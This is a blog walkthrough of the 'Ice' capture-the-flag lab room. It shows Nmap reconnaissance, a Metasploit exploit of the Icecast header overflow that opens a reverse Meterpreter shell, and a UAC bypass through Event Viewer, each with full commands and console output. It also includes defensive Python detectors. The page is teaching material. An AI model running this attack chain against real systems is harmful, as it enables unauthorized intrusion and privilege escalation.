Ice

Posted by r3kind1e on July 29, 2023

Ice

Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

Kali Linux : 10.18.72.222

Target IP Address : 10.10.184.85

Recon

Scan and enumerate our victim!

Deploy the machine! This may take up to three minutes to start.

Launch a scan against our target machine; I recommend using a SYN scan set to scan all ports on the machine. The scan command is provided as a hint; however, it’s recommended to complete the room ‘Nmap’ prior to this room.

To perform a SYN scan on all ports of a target machine using Nmap (a popular network scanning tool), you can use the following command:

nmap -sS -p- <target_ip>

Breaking the command down:

  • nmap: This is the command to execute Nmap.
  • -sS: This option specifies a SYN scan, also known as a half-open scan. It sends SYN packets to the target ports to determine if they are open, closed, or filtered.
  • -p-: This option tells Nmap to scan all 65535 TCP ports on the target machine. The dash (-) after -p means “all ports.”
  • <target_ip>: Replace this with the IP address of the machine you want to scan. For example, 10.10.19.228.

There are several ways to make an Nmap scan faster. Here are some tips:

  1. Adjust the Timing Template: Nmap provides different timing templates that control the speed and aggressiveness of the scan. The default template is usually “Normal” (-T3). You can try using a faster timing template such as “Aggressive” (-T4) or “Insane” (-T5). Keep in mind that higher timing templates can be more aggressive and may increase the chances of being detected by intrusion detection systems (IDS) or firewalls.

    Example: nmap -T4 -p- <target_ip>

  2. Specify Target Ports: Instead of scanning all 65535 TCP ports, you can focus on specific ports or a range of ports that are more likely to be open and interesting. This reduces the number of packets sent and shortens the scan time.

    Example: nmap -p 1-1000 <target_ip>

  3. Parallel Scanning: Nmap supports parallel scanning: it probes multiple ports on a host, and multiple hosts, at the same time, which significantly speeds up the scanning process.

    Example for scanning multiple hosts (here with -F, which restricts the scan to the 100 most common ports): nmap -T4 -F 192.168.1.100 192.168.1.101 192.168.1.102

    Example for scanning a handful of ports on one host: nmap -p 22,80,443 -T4 <target_ip>

  4. Disable DNS Resolution: By default, Nmap performs reverse DNS resolution to find hostnames for the scanned IP addresses. If you don’t need this information, disabling it with -n saves time.

    Example (-n disables DNS resolution; --max-rtt-timeout and --max-retries additionally cap how long Nmap waits on each probe): nmap -T4 -p- --max-rtt-timeout 200ms --max-retries 1 -n <target_ip>

  5. Use Version Detection and Script Scanning Selectively: Nmap can perform version detection and run various scripts to gather more information about the target. However, these features can take additional time. Use them selectively based on your specific goals.

    Example for version detection: nmap -sS -p- -sV <target_ip>

    Example for script scanning: nmap -sS -p- -sC <target_ip>

Remember, while these techniques can speed up the scan, using aggressive scanning options might increase the chances of being detected and blocked by security systems. Always be mindful of the network you are scanning and ensure you have permission to conduct the scan on the target system. Unauthorized scanning is both unethical and illegal.

┌──(root㉿kali)-[~]
└─# nmap 10.10.184.85        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 05:45 EDT
Nmap scan report for 10.10.184.85
Host is up (0.26s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
8000/tcp  open  http-alt
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 71.00 seconds

┌──(root㉿kali)-[~]
└─# nmap -sV -p 135,139,445,3389,5357,8000 10.10.184.85
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 05:49 EDT
Nmap scan report for 10.10.184.85
Host is up (0.26s latency).

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  tcpwrapped
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp open  http         Icecast streaming media server
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.69 seconds

Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shut down), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?

3389

What service did nmap identify as running on port 8000? (First word of this service)

Icecast

What does Nmap identify as the hostname of the machine? (All caps for the answer)

DARK-PC

Gain Access

Exploit the target vulnerable service to gain a foothold!

Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or at least the version running on our target, is heavily flawed and has a high-severity vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.

Question Hint: This type of vulnerability allows for an attacker to execute arbitrary code in an unauthenticated fashion. The name can be found listed at the ‘Vulnerability Type’ on https://www.cvedetails.com

execute code overflow

What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

CVE-2004-1561

Now that we’ve found our vulnerability, let’s find our exploit. For this section of the room, we’ll use the Metasploit module associated with this exploit. Let’s go ahead and start Metasploit using the command msfconsole.

After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.

exploit/windows/http/icecast_header

┌──(root㉿kali)-[~]
└─# msfconsole -q 
msf6 > search Icecast

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

Let’s go ahead and select this module for use. Type either the command use icecast or use 0 to select our search result.

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

After selecting our module, we now have to check what options we have to set. Run the command show options. What is the only required setting which is currently blank?

RHOSTS

msf6 exploit(windows/http/icecast_header) > show options

Module options (exploit/windows/http/icecast_header):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   8000             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.117.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/icecast_header) > setg RHOSTS 10.10.184.85
RHOSTS => 10.10.184.85
msf6 exploit(windows/http/icecast_header) > set LHOST 10.18.72.222
LHOST => 10.18.72.222

First, let’s check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let’s set that last option to our target IP. Now that we have everything ready to go, let’s run our exploit using the command exploit.

Escalate

Enumerate the machine and find potential privilege escalation paths to gain Admin powers!

Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now?

Meterpreter

msf6 exploit(windows/http/icecast_header) > exploit

[*] Started reverse TCP handler on 10.18.72.222:4444 
[*] Sending stage (175686 bytes) to 10.10.184.85
[*] Meterpreter session 1 opened (10.18.72.222:4444 -> 10.10.184.85:49244) at 2023-07-29 06:41:13 -0400

meterpreter > 

What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.

Dark

meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

What build of Windows is the system?

7601

Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?

x64

Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.184.85 - Collecting local exploits for x86/windows...
[*] 10.10.184.85 - 186 exploit checks are being tried...
[+] 10.10.184.85 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.184.85 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.184.85 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.184.85 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.184.85 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 12  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 13  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 14  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 15  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 16  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 17  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 18  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 19  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 20  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 22  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 23  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 24  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 25  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 26  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 27  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 28  exploit/windows/local/ms10_015_kitrap0d                        No                       The target is not exploitable.
 29  exploit/windows/local/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.
 30  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 31  exploit/windows/local/ms16_016_webdav                          No                       The target is not exploitable.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.
 33  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 34  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 35  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 36  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 37  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The check raised an exception.

Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?

exploit/windows/local/bypassuac_eventvwr

Now that we have an exploit in mind for elevating our privileges, let’s background our current session using the command background or CTRL + Z. Take note of which session number we have; this will likely be 1 in this case. We can list all of our active sessions using the command sessions when outside of the meterpreter shell.

meterpreter > 
Background session 1? [y/N]  
msf6 exploit(windows/http/icecast_header) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.18.72.222:4444 -> 10.10.184.85:49244 (10.10.184.85)

Go ahead and select our previously found local exploit for use with the command use FULL_PATH_FOR_EXPLOIT.

Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

This module bypasses Windows UAC by hijacking a special key in the registry under the current user hive and inserting a custom command that is invoked when the Windows Event Viewer is launched. It spawns a second shell that has the UAC flag turned off. The module modifies a registry key but cleans it up after the payload has been invoked. The architecture of the payload does not need to match the operating system. If EXE::Custom is specified, the DLL should call ExitProcess() after starting the payload in a separate process.

msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Local exploits require a session to be selected (something we can verify with the command show options); set this now using the command set session SESSION_NUMBER.

msf6 exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.117.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(windows/local/bypassuac_eventvwr) > set LPORT 4433 
LPORT => 4433

Now that we’ve set our session number, further options will be revealed in the options menu. We’ll have to set one more as our listener IP isn’t correct. What is the name of this option?

LHOST

Set this option now. You might have to check your IP on the TryHackMe network using the command ip addr.

After we’ve set this last option, we can now run our privilege escalation exploit. Run this now using the command run. Note: this might take a few attempts, and you may need to relaunch the box and exploit the service again if it fails.

msf6 exploit(windows/local/bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on 10.18.72.222:4433 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.184.85
[*] Meterpreter session 2 opened (10.18.72.222:4433 -> 10.10.184.85:49277) at 2023-07-29 07:11:38 -0400
[*] Cleaning up registry keys ...

meterpreter > 
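The log above shows the bypass from the attacker's side (registry keys configured, eventvwr.exe executed, keys cleaned up). As an added example, not part of the walkthrough or of the Metasploit module, here is what the same sequence looks like to a defender reading Sysmon-style events. It assumes the hijacked handler is HKCU\Software\Classes\mscfile\shell\open\command (what the public Event Viewer technique uses; the page itself only says "a special key in the registry under the current user hive"), and the events, SID and timestamps are constructed, with the powershell.exe PIDs taken from the page's ps listing.

```python
"""Detect the Event Viewer UAC-bypass sequence (registry handler written,
eventvwr.exe launched, handler removed) in Sysmon-style events.

Added example for this walkthrough, not the page's or Metasploit's code.
Assumption: the hijacked handler is
HKCU\\Software\\Classes\\mscfile\\shell\\open\\command, as in the public
eventvwr technique. The events, SID and timestamps below are constructed."""

import re
from datetime import datetime

# Sysmon logs HKCU writes as HKU\<SID>\..., so match only the tail of the key.
MSCFILE_HANDLER = re.compile(
    r"\\Software\\Classes\\mscfile\\shell\\open\\command(\\\(Default\))?$", re.I)
EVENTVWR = re.compile(r"\\eventvwr\.exe$", re.I)
MMC = re.compile(r"\\mmc\.exe", re.I)

SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed
ICECAST = r"C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe"  # from the page's ps
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe"

# Constructed Sysmon events: 13 = registry value set, 12 = key deleted,
# 1 = process create. Only the fields the rules need are included.
SAMPLE_EVENTS = [
    {"id": 13, "time": "07:11:25", "image": ICECAST,
     "target": SID + r"\Software\Classes\mscfile\shell\open\command\(Default)",
     "details": POWERSHELL + " -constructed-payload-arguments"},
    {"id": 1, "time": "07:11:26", "pid": 2236,
     "image": r"C:\Windows\SysWOW64\eventvwr.exe", "parent": ICECAST},
    {"id": 1, "time": "07:11:27", "pid": 2456, "image": POWERSHELL,
     "parent": r"C:\Windows\SysWOW64\eventvwr.exe"},
    {"id": 12, "time": "07:11:38", "image": ICECAST,
     "target": SID + r"\Software\Classes\mscfile\shell\open\command"},
    # Benign: an administrator opening Event Viewer, which hands off to mmc.exe.
    {"id": 1, "time": "09:00:00", "pid": 3100,
     "image": r"C:\Windows\System32\mmc.exe",
     "parent": r"C:\Windows\System32\eventvwr.exe"},
]


def scan_events(events):
    """Apply the per-event rules; returns (rule, time, evidence) tuples."""
    findings = []
    for e in events:
        if (e["id"] == 13 and MSCFILE_HANDLER.search(e["target"])
                and not MMC.search(e["details"])):
            # A per-user mscfile handler is absent on a default install, and one
            # that launches anything but mmc.exe is a hijack.
            findings.append(("mscfile_handler_hijack", e["time"], e["details"]))
        elif e["id"] == 12 and MSCFILE_HANDLER.search(e["target"]):
            # The bypass deletes its key seconds later ("Cleaning up registry
            # keys" in the log), so a short-lived key is itself a signal.
            findings.append(("mscfile_handler_removed", e["time"], e["image"]))
        elif (e["id"] == 1 and EVENTVWR.search(e.get("parent", ""))
                and not MMC.search(e["image"])):
            # Legitimate eventvwr.exe starts nothing but mmc.exe.
            findings.append(("eventvwr_spawned_non_mmc", e["time"], e["image"]))
    return findings


def _seconds_between(earlier, later):
    fmt = "%H:%M:%S"
    return (datetime.strptime(later, fmt) - datetime.strptime(earlier, fmt)).total_seconds()


def is_eventvwr_bypass(findings, window_s=60):
    """True when a handler hijack is followed within window_s by eventvwr.exe
    launching something other than mmc.exe: the whole sequence, not a lone write."""
    hijacks = [f for f in findings if f[0] == "mscfile_handler_hijack"]
    spawns = [f for f in findings if f[0] == "eventvwr_spawned_non_mmc"]
    return any(0 <= _seconds_between(h[1], s[1]) <= window_s
               for h in hijacks for s in spawns)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for rule, when, evidence in found:
        print(when, rule, evidence)
    print("UAC bypass sequence:", is_eventvwr_bypass(found))
```

The per-event rules fire on their own, but only the ordered pair (handler written, then eventvwr.exe spawning a non-mmc child) is treated as the bypass, which keeps an administrator's normal Event Viewer launch out of the alert.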

Following completion of the privilege escalation, a new session will be opened. Interact with it now using the command sessions SESSION_NUMBER.

meterpreter > 
Background session 2? [y/N]  
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.18.72.222:4444 -> 10.10.184.85:49244 (10.10.184.85)
  2         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.18.72.222:4433 -> 10.10.184.85:49277 (10.10.184.85)

msf6 exploit(windows/local/bypassuac_eventvwr) > sessions 2
[*] Starting interaction with 2...

meterpreter > 

We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?

SeTakeOwnershipPrivilege

meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

SeTakeOwnershipPrivilege is a Windows user right that determines whether a user or process can take ownership of securable objects, such as files and directories, that it does not currently own. It is one of several settings that control user rights and permissions in Windows.

Once a user or process owns an object it can rewrite the object’s permissions, which in effect gives it full control: it can change permissions, modify or delete the object, and perform various administrative tasks on it.

Typically, administrators and certain privileged system processes have this privilege assigned by default, since they need it for tasks such as modifying system files or accessing sensitive resources. Standard users usually do not have it, which prevents unauthorized changes to critical system components.

Holding SeTakeOwnershipPrivilege is potentially dangerous, since it allows unauthorized access to and modification of sensitive data if misused; it should therefore be restricted to trusted and authorized users or processes. In this walkthrough its appearance in the second session is exactly what shows that the UAC bypass worked: the filtered token of session 1 did not carry it.

Proper access control and permission management are crucial for maintaining the security of a Windows system, so users and administrators should exercise caution when granting or modifying security privileges.
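The two getprivs listings on this page are the clearest evidence of the elevation. As an added example (my code, not the page's or Metasploit's), the script below diffs them, flags the privileges that only an elevated token carries, and accepts whoami /priv output in the same way; the two listings are copied from the page's session 1 and session 2 output.

```python
"""Diff two privilege listings (Meterpreter getprivs or whoami /priv output)
and flag privileges that only an elevated token carries.

Added example for this walkthrough; not part of the page or of Metasploit.
The two listings below are copied from the page's session 1 and session 2
output, so the script reproduces the before/after comparison offline."""

import re

# Copied from the page: getprivs in the first (medium-integrity) session.
BEFORE_BYPASS = """\
Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
"""

# Copied from the page: getprivs after the UAC bypass (session 2).
AFTER_BYPASS = """\
Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
"""

# Privileges a UAC-filtered (medium-integrity) user token never carries. Any of
# them in a process owned by an interactive user means it runs elevated. (Service
# accounts such as NETWORK SERVICE legitimately hold SeImpersonatePrivilege, so
# apply this to user processes, not to services.)
HIGH_RISK = {
    "SeDebugPrivilege": "open any process, including lsass, for read/write",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
}

PRIV_NAME = re.compile(r"^Se[A-Za-z]+Privilege$")


def parse_privs(text):
    """Return the set of privilege names in a getprivs or whoami /priv listing.

    Only the first token of each line is examined, so the state column that
    whoami /priv adds (Enabled/Disabled) is ignored: a disabled privilege is
    still held by the token and can be enabled at any time."""
    names = set()
    for line in text.splitlines():
        tokens = line.split()
        if tokens and PRIV_NAME.match(tokens[0]):
            names.add(tokens[0])
    return names


def privilege_delta(before, after):
    """Compare two listings; pass "" as before to assess a single listing."""
    old, new = parse_privs(before), parse_privs(after)
    high_risk = {p: HIGH_RISK[p] for p in sorted(new) if p in HIGH_RISK}
    return {
        "gained": sorted(new - old),
        "lost": sorted(old - new),
        "high_risk": high_risk,
        "elevated": bool(high_risk),
    }


def report(delta):
    """Human-readable summary of a privilege_delta() result."""
    lines = ["elevated token: %s" % ("YES" if delta["elevated"] else "no"),
             "gained %d privilege(s), lost %d" % (len(delta["gained"]), len(delta["lost"]))]
    for name, why in delta["high_risk"].items():
        lines.append("  [!] %s: %s" % (name, why))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(privilege_delta(BEFORE_BYPASS, AFTER_BYPASS)))
```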

Looting

Learn how to gather additional credentials and crack the saved hashes on the machine.

Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let’s list the processes using the command ps. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn’t).

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 100   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 508   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 820   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 888   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 936   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1064  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1196  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1304  100   dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
 1320  1292  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 1380  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1408  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1448  692   taskhost.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\taskhost.exe
 1568  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1576  820   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 1660  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1696  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1844  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 2060  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2256  1320  Icecast2.exe          x86   1        Dark-PC\Dark                  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2280  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2456  2236  powershell.exe        x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
 2476  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe
 2660  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2668  820   slui.exe              x64   1        Dark-PC\Dark                  C:\Windows\System32\slui.exe
